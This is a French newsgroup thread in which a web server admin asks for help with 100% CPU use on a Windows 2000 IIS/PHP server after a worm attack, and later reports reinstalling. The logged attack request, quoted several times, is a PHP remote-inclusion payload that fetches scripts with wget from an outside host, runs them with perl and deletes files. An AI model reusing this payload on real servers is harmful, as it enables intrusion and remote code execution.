Consommation CPU à 100% par DLLHOST.EXE depuis 3 jours !

Le
Anonyme
Bonjour,

Je dispose d'un serveur web de production sous Windows 2000 SP4 avec tous
les patchs de sécurité + urlscan etc. Le tout fonctionne avec PHP en ISAPI
très bien depuis deux ans. Il s'agit d'un Pentium 4 2.4 ghz avec 1 Go de RAM
+ SCSI. Le site est en mode de protection isolé.
Dimanche matin, le CPU a commencé à s'emballer, je regarde dans les logs et
vois dans ceux d'urlscan des requetes de ce style:

page#&code@49/index.php?page=http://midomain.false.ca/~pillar/.zk/
php.gif?&cmd%20/tmp;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f08895
55397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%20mi
domain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;perl%20ses
s_189f0f0889555397a4de5485dd611113;wget%20midomain.false.ca/~pillar/.zk/sess
_189f0f0889555397a4de5485dd611112;perl%20sess_189f0f0889555397a4de5485dd6111
12;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd61111
4;perl%20sess_189f0f0889555397a4de5485dd611114;rm%20-rf%20sess_189f0f0889555
397a4de5485dd611113.*%20sess_189f0f0889555397a4de5485dd611114.*%20sess_189f0
f0889555397a4de5485dd611112.*;cp%20sess_189f0f0889555397a4de5485dd611111%20s
ess_189f0f0889555397a4de5485dd611113%20sess_189f0f0889555397a4de5485dd611114
%20sess_189f0f0889555397a4de5485

Visiblement d'après ce que je peux trouver sur Google, il s'agit d'un ver
qui essaye d'attaquer les scripts PHP. A priori le serveur n'est pas
touché/endommagé par ce ver mais la consommation CPU ne baisse pas et reste
à 100% en continu (en grande majorité consommée par le processus
DLLHOST.EXE) et les courbes de bande passantre MRTG montrent un débit
constant de 2 à 3 Mbps en direction du serveur au lieu des 200 à 300 Kbps
habituels. L'installation d'un filtre ISAPI de type URL rewriter me permet
de bloquer les requetes de ce virus et dès Lundi matin je n'en vois plus
apparaitre dans les logs. La consommation de bande passante a également
nettement baissée. En revanche, la consommation du CPU reste extremement
critique depuis!

Je n'ai pas fait de modifications dans le code du site, j'ai vérifié le code
PHP et tout semble ok. J'ai essayé plusieurs versions de PHP, créé un
nouveau site web dans la MMC de IIS, essayé le mode de protection en file
d'attente, désactivé les pubs sur le site, laissé le strict minimum, mis à
jour MySQL etc. Mais l'utilisation processeur reste entre 80% et 100% alors
qu'avant cet épisode de dimanche, le site était très performant et le CPU
était utilisé à environ 40% de moyenne et ce depuis de nombreux mois.

Il reste 500 Mo de RAM libre donc ça n'est pas un soucis. J'ai redémarré
plusieurs fois mais toujours rien. J'ai également vérifié la présence de
fichiers anormaux sur le disque, vidé les fichiers temporaires. Exécuté
Ad-Aware etc.

Du jour au lendemain, le même site exactement demande plus du double de
temps CPU supplémentaire pour s'exécuter et son affichage est d'une
lenteur

Ni les logs d'IIS ni la commande NETSTAT -NA ne laisse apparaitre d'adresses
IP se connectant au serveur plus fréquemment qu'une autre.
Tout cela me fait tout de même penser à une attaque de type DDOS sans que je
sache si cela a un lien avec le virus de dimanche.

Je précise que j'ai essayé les IIS Debug Tools sans que ca ne m'apporte
grand chose comme informations.

Nous sommes aujourd'hui Mardi soir et cela fait trois jours complet que je
travaille au problème sans avoir trouvé de solutions. Ce site web
représentant mon activité je suis aujourd'hui dans un beau pétrain. De plus
le serveur est dans une baie à 300 Km de chez moi donc ca n'est pas évident.

Trois solutions s'offrent à moi désormais: réinstaller IIS pour voir mais je
n'y crois pas, installer Apache pour tester! Ou me déplacer au datacenter
pour formater le disque dur du serveur et repartir à zéro en espérant que
cela ne continue pas.
Une autre solution serait que qqun parmi vous soit en mesure de me mettre
sur la bonne voie :-)

Je vous remercie pour votre attention et j'espère que vous pourrez m'aider
dans cette délicate épreuve.

--
Vos réponses
Trier par : date / pertinence
Oliv'
Le #11486891
Salut,
Je dirais que le virus est toujours actif.
Essaye ce lien
http://securityresponse.symantec.com/avcenter/venc/data/w32.welchia.worm.html
ou les antivirus en ligne.
Oliv'

"Anonyme" <> a écrit dans le
message de news:
41d1f34a$0$32756$
Bonjour,

Je dispose d'un serveur web de production sous Windows 2000 SP4 avec tous
les patchs de sécurité + urlscan etc. Le tout fonctionne avec PHP
en ISAPI
très bien depuis deux ans. Il s'agit d'un Pentium 4 2.4 ghz avec 1 Go de
RAM
+ SCSI. Le site est en mode de protection isolé.
Dimanche matin, le CPU a commencé à s'emballer, je regarde dans
les logs et
vois dans ceux d'urlscan des requetes de ce style:

page#&/index.php?page=http://midomain.false.ca/~pillar/.zk/
php.gif?&cmdÍ%20/tmp;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f08895
55397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%20mi
domain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;perl%20ses
s_189f0f0889555397a4de5485dd611113;wget%20midomain.false.ca/~pillar/.zk/sess
_189f0f0889555397a4de5485dd611112;perl%20sess_189f0f0889555397a4de5485dd6111
12;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd61111
4;perl%20sess_189f0f0889555397a4de5485dd611114;rm%20-rf%20sess_189f0f0889555
397a4de5485dd611113.*%20sess_189f0f0889555397a4de5485dd611114.*%20sess_189f0
f0889555397a4de5485dd611112.*;cp%20sess_189f0f0889555397a4de5485dd611111%20s
ess_189f0f0889555397a4de5485dd611113%20sess_189f0f0889555397a4de5485dd611114
%20sess_189f0f0889555397a4de5485

Visiblement d'après ce que je peux trouver sur Google, il s'agit d'un ver
qui essaye d'attaquer les scripts PHP. A priori le serveur n'est pas
touché/endommagé par ce ver mais la consommation CPU ne baisse pas
et reste
à 100% en continu (en grande majorité consommée par le
processus
DLLHOST.EXE) et les courbes de bande passantre MRTG montrent un débit
constant de 2 à 3 Mbps en direction du serveur au lieu des 200 à
300 Kbps
habituels. L'installation d'un filtre ISAPI de type URL rewriter me permet
de bloquer les requetes de ce virus et dès Lundi matin je n'en vois plus
apparaitre dans les logs. La consommation de bande passante a également
nettement baissée. En revanche, la consommation du CPU reste extremement
critique depuis!

Je n'ai pas fait de modifications dans le code du site, j'ai
vérifié le code
PHP et tout semble ok. J'ai essayé plusieurs versions de PHP,
créé un
nouveau site web dans la MMC de IIS, essayé le mode de protection en file
d'attente, désactivé les pubs sur le site, laissé le strict
minimum, mis à
jour MySQL etc. Mais l'utilisation processeur reste entre 80% et 100% alors
qu'avant cet épisode de dimanche, le site était très
performant et le CPU
était utilisé à environ 40% de moyenne et ce depuis de
nombreux mois.

Il reste 500 Mo de RAM libre donc ça n'est pas un soucis. J'ai
redémarré
plusieurs fois mais toujours rien. J'ai également vérifié
la présence de
fichiers anormaux sur le disque, vidé les fichiers temporaires.
Exécuté
Ad-Aware etc.

Du jour au lendemain, le même site exactement demande plus du double de
temps CPU supplémentaire pour s'exécuter et son affichage est
d'une lenteur......

Ni les logs d'IIS ni la commande NETSTAT -NA ne laisse apparaitre d'adresses
IP se connectant au serveur plus fréquemment qu'une autre.
Tout cela me fait tout de même penser à une attaque de type DDOS
sans que je
sache si cela a un lien avec le virus de dimanche.

Je précise que j'ai essayé les IIS Debug Tools sans que ca ne
m'apporte
grand chose comme informations.

Nous sommes aujourd'hui Mardi soir et cela fait trois jours complet que je
travaille au problème sans avoir trouvé de solutions. Ce site web
représentant mon activité je suis aujourd'hui dans un beau
pétrain. De plus
le serveur est dans une baie à 300 Km de chez moi donc ca n'est pas
évident.

Trois solutions s'offrent à moi désormais: réinstaller IIS
pour voir mais je
n'y crois pas, installer Apache pour tester! Ou me déplacer au datacenter
pour formater le disque dur du serveur et repartir à zéro en
espérant que
cela ne continue pas.
Une autre solution serait que qqun parmi vous soit en mesure de me mettre
sur la bonne voie :-)

Je vous remercie pour votre attention et j'espère que vous pourrez
m'aider
dans cette délicate épreuve.

--
Anonyme
Le #11486881
Bonjour,

Merci pour la réponse. J'ai déjà scanné le disque
avec un antivirus sans
qu'il ne trouve rien. Mais bon peu importe puisque je me suis finalement
rendu sur place pour une réinstallation du système et ça
remarche comme
avant. J'ignore ce qui a pû se passer...

--
Julien
"Oliv'" <(supprimerceci)> a
écrit dans le
message de news:41d913da$0$2763$
Salut,
Je dirais que le virus est toujours actif.
Essaye ce lien




http://securityresponse.symantec.com/avcenter/venc/data/w32.welchia.worm.html
ou les antivirus en ligne.
Oliv'

"Julien Sambourg" <> a écrit dans le
message de news:
41d1f34a$0$32756$
Bonjour,

Je dispose d'un serveur web de production sous Windows 2000 SP4 avec tous
les patchs de sécurité + urlscan etc. Le tout fonctionne avec PHP
en ISAPI
très bien depuis deux ans. Il s'agit d'un Pentium 4 2.4 ghz avec 1 Go de



RAM
+ SCSI. Le site est en mode de protection isolé.
Dimanche matin, le CPU a commencé à s'emballer, je regarde dans
les logs



et
vois dans ceux d'urlscan des requetes de ce style:

page#&/index.php?page=http://midomain.false.ca/~pillar/.zk/




php.gif?&cmdÍ%20/tmp;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f08895




55397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%20mi




domain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;perl%20ses




s_189f0f0889555397a4de5485dd611113;wget%20midomain.false.ca/~pillar/.zk/sess




_189f0f0889555397a4de5485dd611112;perl%20sess_189f0f0889555397a4de5485dd6111




12;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd61111




4;perl%20sess_189f0f0889555397a4de5485dd611114;rm%20-rf%20sess_189f0f0889555




397a4de5485dd611113.*%20sess_189f0f0889555397a4de5485dd611114.*%20sess_189f0




f0889555397a4de5485dd611112.*;cp%20sess_189f0f0889555397a4de5485dd611111%20s




ess_189f0f0889555397a4de5485dd611113%20sess_189f0f0889555397a4de5485dd611114

%20sess_189f0f0889555397a4de5485

Visiblement d'après ce que je peux trouver sur Google, il s'agit d'un
ver
qui essaye d'attaquer les scripts PHP. A priori le serveur n'est pas
touché/endommagé par ce ver mais la consommation CPU ne baisse
pas et



reste
à 100% en continu (en grande majorité consommée par le
processus
DLLHOST.EXE) et les courbes de bande passantre MRTG montrent un débit
constant de 2 à 3 Mbps en direction du serveur au lieu des 200 à
300 Kbps
habituels. L'installation d'un filtre ISAPI de type URL rewriter me permet
de bloquer les requetes de ce virus et dès Lundi matin je n'en vois plus
apparaitre dans les logs. La consommation de bande passante a également
nettement baissée. En revanche, la consommation du CPU reste extremement
critique depuis!

Je n'ai pas fait de modifications dans le code du site, j'ai
vérifié le



code
PHP et tout semble ok. J'ai essayé plusieurs versions de PHP,
créé un
nouveau site web dans la MMC de IIS, essayé le mode de protection en
file
d'attente, désactivé les pubs sur le site, laissé le
strict minimum, mis à
jour MySQL etc. Mais l'utilisation processeur reste entre 80% et 100%



alors
qu'avant cet épisode de dimanche, le site était très
performant et le CPU
était utilisé à environ 40% de moyenne et ce depuis de
nombreux mois.

Il reste 500 Mo de RAM libre donc ça n'est pas un soucis. J'ai
redémarré
plusieurs fois mais toujours rien. J'ai également vérifié
la présence de
fichiers anormaux sur le disque, vidé les fichiers temporaires.
Exécuté
Ad-Aware etc.

Du jour au lendemain, le même site exactement demande plus du double de
temps CPU supplémentaire pour s'exécuter et son affichage est
d'une
lenteur......

Ni les logs d'IIS ni la commande NETSTAT -NA ne laisse apparaitre



d'adresses
IP se connectant au serveur plus fréquemment qu'une autre.
Tout cela me fait tout de même penser à une attaque de type DDOS
sans que



je
sache si cela a un lien avec le virus de dimanche.

Je précise que j'ai essayé les IIS Debug Tools sans que ca ne
m'apporte
grand chose comme informations.

Nous sommes aujourd'hui Mardi soir et cela fait trois jours complet que je
travaille au problème sans avoir trouvé de solutions. Ce site web
représentant mon activité je suis aujourd'hui dans un beau
pétrain. De



plus
le serveur est dans une baie à 300 Km de chez moi donc ca n'est pas



évident.

Trois solutions s'offrent à moi désormais: réinstaller IIS
pour voir mais



je
n'y crois pas, installer Apache pour tester! Ou me déplacer au
datacenter
pour formater le disque dur du serveur et repartir à zéro en
espérant que
cela ne continue pas.
Une autre solution serait que qqun parmi vous soit en mesure de me mettre
sur la bonne voie :-)

Je vous remercie pour votre attention et j'espère que vous pourrez
m'aider
dans cette délicate épreuve.

--




Publicité
Poster une réponse
Anonyme